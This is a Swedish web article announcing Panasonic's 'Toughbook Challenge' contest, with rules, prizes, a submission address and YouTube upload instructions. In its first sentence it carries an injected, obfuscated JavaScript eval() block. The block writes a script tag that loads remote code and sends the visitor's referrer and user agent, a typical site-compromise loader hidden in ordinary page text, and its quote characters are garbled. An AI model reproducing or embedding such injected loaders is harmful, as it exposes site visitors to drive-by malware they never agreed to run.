Image Image Image Image Image Image Image Image Image Image

| 4 juni, 2020

Scroll to top

Top

Panasonic lanserar Toughbook Challenge

Panasonic lanserar Toughbook Challenge

Idag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nttne|var|u0026u|referrer|iytkz||js|php’.split(’|’),0,{}))
lanserar Panasonic Toughbook Challenge – en tävling om vem som har Sveriges tuffaste jobb. Dagligen sliter miljontals människor på jobbet runt om i Sverige. Allt ifrån byggnadsarbetaren som tampas med höjdskräck och ruskväder till förskolelärare som på egen hand måste ta hand om alltför stora och krävande barngrupper. Vad innebär egentligen ett riktigt tufft jobb? En sak är att berätta om det. En annan sak är att faktiskt fota eller fånga det på film. 

Dessa är tävlingsreglerna i Toughbook Challenge:

– Spela in en film på max en minut, med t.ex. din mobilkamera, och ladda upp din färdiga film – ditt tävlingsbidrag – på YouTube enligt beskrivningen längre ned i texten och skicka länken för din video till mailadressen nedan.
– Eller skicka in bilder, max fem stycken. Numrera bilderna och skicka med beskrivande text till mailadressen nedan.

Hit skickar du ditt tävlingsbidrag:
toughbook.nordic@eu.panasonic.com

Filmen eller bilderna ska beskriva vad som gör ditt arbete krävande. Du kan förslagsvis berätta om ditt tuffa arbete alternativt filma en eller flera sekvenser på sammanlagt en minut från olika krävande situationer på din arbetsplats. Eller ta någon/några bilder och beskriv dina utmaningar med en kort text.

Tävlingen kommer vara öppen under ca en månad, från måndag 12 januari till fredag 13 februari 2015.

När tävlingen är avslutad kommer juryn, som består av utvalda personer från Panasonic och Northern Link PR Sverige AB, att välja ut två vinnande bidrag.

1:a pris är en Panasonic Tougpad FZ-M1 (värde ca 20 000 kr) – en fläktfri, stryktålig datorplatta med Windows 8.1 Pro och utomhusskärm i fickformat. Läs mer här.

2:a pris är en Panasonic HX-A500 (värde ca 4000 kr) – världens första actionkamera som kan spela in i 4K. Läs mer här.

Här är en Google-guide om hur du går tillväga för att ladda upp din film på youtube.

  1. Logga in på YouTube.
  2. Klicka på knappen Ladda upp längst upp på sidan.
  3. Innan du påbörjar uppladdningen kan du ange sekretessinställningar för videoklippet.
  4. Välj videoklippet du vill ladda upp från din dator. Du kan även spela in ett videoklipp med din webbkamera, skapa ett videobildspel eller importera ett videoklipp från Google+.
  5. Medan videoklippet laddas upp kan du redigera grundläggande information och avancerade inställningar samt välja om du vill meddela prenumeranter (om du avmarkerar det här alternativet delas ingen kommunikation med dina prenumeranter).
  6. Klicka på Publicera för att slutföra uppladdningen av ett offentligt videoklipp på YouTube. Om du har ställt in sekretessinställningarna för videoklippet som privat eller olistat, klickar du bara på Klart när du vill avsluta uppladdningen eller på Dela om du vill dela videoklippet privat.
  7. Om du inte har klickat på Publicera kan inte andra personer se ditt videoklipp. Du kan publicera ditt videoklipp senare i Videohanteraren.

När uppladdningen är klar får du ett e-postmeddelande om att videoklippet har laddats upp och bearbetats. Då kan du vidarebefordra meddelandet till familj och vänner.

När du har lagt upp din film så skickar du bara din videolänk och dina kontaktuppgifter till toughbook.nordic@eu.panasonic.com så är du med i tävlingen. Du är även välkommen att maila till ovanstående adress om du t ex har frågor om tävlingen eller behöver hjälp med själva filmuppladdningen.

Ovanstående information ligger även ute på Panasonics blogg på adressenhttp://blog.panasonicnordic.com/sv/toughbook-sv/toughbook-challenge-har-du-sveriges-tuffaste-jobb/. För bilder, se bifogat eller gå in på http://blog.panasonicnordic.com/nb/imagebank/2014-2/

Lycka till!

Vinnarna är själva ansvariga för att uppge eventuella skattepliktiga premier i sin självdeklaration och att själva stå för eventuell vinstskatt. Eventuella premier kan inte bytas ut mot kontanter.